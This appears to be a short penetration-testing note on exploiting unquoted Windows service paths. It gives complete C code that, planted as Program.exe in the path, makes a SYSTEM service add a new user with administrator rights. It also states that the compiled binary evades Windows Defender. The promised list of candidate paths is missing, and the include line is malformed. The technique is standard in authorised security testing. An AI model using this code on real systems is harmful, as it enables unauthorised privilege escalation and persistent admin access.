Exploiting Unquoted Paths

author: Nathan Acks
date: 2022-08-17

When Windows encounters an unquoted path it tries all possible paths, from shortest to longest. Thus C:\Program Files\Application Path\App.exe will cause Windows to look for the following executables, in order:

If an executable is found on a shorter path, then the remainder of the (unquoted) path is treated as command line parameters.

Exploiting Services Running as SYSTEM

If a service is running as SYSTEM, the following code can be inserted (as Program.exe or Application.exe in the example above) and will add a new user with admin privileges. (USERNAME and PASSWORD obviously need to be updated to fit the current use case.)

#include <stdlib.h

int main() {
	int i;

	i = system("net user USERNAME PASSWORD /add");
	i = system("net localgroup administrators USERNAME /add");

	return 0;
}

As of August 17, 2022, binaries compiled from this code are not detected as malicious by Windows Defender.